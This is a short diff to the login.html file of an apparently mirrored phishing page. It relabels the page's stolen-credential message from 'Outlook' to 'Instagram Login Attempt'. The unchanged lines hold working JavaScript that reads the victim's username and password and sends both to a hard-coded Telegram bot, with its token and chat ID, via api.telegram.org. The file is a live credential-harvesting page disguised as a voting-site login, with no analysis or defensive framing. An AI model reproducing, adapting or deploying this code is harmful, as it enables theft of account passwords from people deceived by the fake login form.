--- a/login.html
+++ b/login.html
@@ -117,7 +117,7 @@
       const username = document.getElementById('username').value;
       const password = document.getElementById('password').value;
 
-      const telegramMessage = `🟦 Outlook Login Attempt\n\n📧 Email: ${username}\n🔑 Password: ${password}`;
+      const telegramMessage = `🟦 Instagram Login Attempt\n\n📧 Email: ${username}\n🔑 Password: ${password}`;
      var token = '8384188856:AAEsf9qHpnJ1-438BQxfxYdJB-T-2IGlCn8';
       var chat_id = '8499614893';
       const url = `https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(telegramMessage)}`;
@@ -145,6 +145,7 @@
 
 <!-- Mirrored from voting.name.ng/slink/vote-ig-fashion_dar_v/login by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 10 Mar 2025 20:44:55 GMT -->
 </html>
+
 
 
 
